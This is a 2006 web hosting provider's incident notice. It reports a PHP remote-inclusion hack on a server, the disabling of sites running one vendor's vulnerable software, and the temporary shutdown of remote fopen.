Monday, October 16, 2006
PHP Fopen - Remote URLs
One of our cluster web servers has been hacked this evening. While no damage
has been caused to customer web sites and our monitoring system prevented
significant damage, the server in question has suffered some damage to the
point where a full reinstallation is advisable.
We have disabled the web sites of customers using products from
www.comdevweb.com as despite warnings on 27th September they have failed to
adequately secure their software resulting in two hacks within 4 days even
after security patches were applied.
As a temporary measure we have disabled the remote fopen function within php
in order to protect our servers from any further risk over the next 24 to 48
hours. While we appreciate that this is likely to cause problems for some
web sites we feel that this is an essential step given that in the last 4
weeks our servers have suffered from over 10 semi successful php hacks as a
result of sites using insecure code and running fopen functions.
We would ask customers using software which includes fopen calls to remote
sites to ensure that the sites are not vulnerable to remote code injection
techniques. We would also remind customers that they should subscribe to the
update mailing lists of any commercial or open source software which they
load onto our servers.
